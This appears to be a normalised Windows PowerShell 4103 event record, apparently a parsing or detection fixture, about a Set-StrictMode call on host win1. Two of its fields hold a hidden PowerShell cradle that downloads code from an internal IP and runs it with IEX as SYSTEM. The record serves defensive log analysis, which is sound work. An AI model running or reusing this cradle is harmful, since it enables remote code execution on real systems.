{
    "action": "modify",
    "datafield1": "Severity = Informational\r\n        Host Name = Default Host\r\n        Host Version = 5.1.15063.786\r\n        Host ID = 3bb4ab63-2418-44a8-a0b1-2a8e579cbecd\r\n        Host Application = powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.11.210:80/b'))\r\n        Engine Version = 5.1.15063.786\r\n        Runspace ID = 3fc75ad0-a273-40df-ac3c-95732a60e246\r\n        Pipeline ID = 1\r\n        Command Name = Set-StrictMode\r\n        Command Type = Cmdlet\r\n        Script Name = \r\n        Command Path = \r\n        Sequence Number = 38\r\n        User = PTSEC\\SYSTEM\r\n        Connected User = \r\n        Shell ID = Microsoft.PowerShell",
    "datafield10": "PTSEC\\SYSTEM",
    "datafield2": "CommandInvocation(Set-StrictMode): \"Set-StrictMode\"\r\nParameterBinding(Set-StrictMode): name=\"Version\"; value=\"1.0\"",
    "datafield3": "",
    "datafield4": "powershell.exe",
    "datafield6": "S-1-5-18",
    "datafield7": "3bb4ab63-2418-44a8-a0b1-2a8e579cbecd",
    "datafield8": "5.1.15063.786",
    "datafield9": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.11.210:80/b'))",
    "event_src.category": "Operating system",
    "event_src.fqdn": "win1.ptsec.com",
    "event_src.hostname": "win1",
    "event_src.subsys": "Microsoft-Windows-PowerShell/Operational",
    "event_src.title": "windows",
    "event_src.vendor": "microsoft",
    "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4103_Set_Strict_Mode",
    "importance": "info",
    "msgid": "4103",
    "object": "configuration",
    "object.state": "on",
    "object.type": "strict mode",
    "object.version": "1.0",
    "status": "success",
    "time": "2019-04-03T09:04:15.754Z"
}
